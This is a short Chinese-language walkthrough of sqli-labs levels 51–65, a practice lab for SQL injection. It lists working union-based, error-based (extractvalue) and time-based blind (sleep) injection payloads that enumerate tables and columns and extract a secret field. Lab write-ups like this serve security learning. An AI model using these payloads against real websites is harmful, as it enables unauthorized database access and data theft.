sqli-labs闯关51-65——通关记录
Less-51
测试可得本关是单引号注入
和上题类似
Less-52
本题是盲注,没有报错信息,可以使用sqlmap,或者使用延时注入,不多说
Less-53
本题也和上面的题没区别
Less-54
这题可以知道库名就是challenges,因为限制了查询次数,所以这题不能用sqlmap
本题可以直接使用联合查询,且可以测出闭合方式为单引号,构造语句
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' --+
接下来一套组合拳
?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='9ntli72i5o' --+ #爆列
?id=-1' union select 1,group_concat(secret_0VFF),3 from challenges.9ntli72i5o --+ #爆字段
成功
Less-55
可以测试出,本题闭合方式为小括号,其余和上题类似,不再赘述
Less-56
本题基于单引号小括号
Less-57
本题基于双引号
Less-58
可以发现这一关没有返回数据库内容,因此无法使用union select,但是可以使用报错注入,使用的是同一个数据库,因此可以直接在前面的关卡获得表名
?id=-1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=‘apipvq6e4j’),0x7e)) --+
Less-59
本题和上题类似,闭合方式为单引号
Less-60
和上题类似,闭合方式是双引号
Less-61
和上题类似,闭合方式是单引号两个小括号
Less-62
本题没有报错提示,就不能用报错注入,采用盲注
?id=1) and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=79 ,0,sleep(10))–+
Less-63——65
都是盲注,只是闭合方式不一样,不多说
终于做完了,要命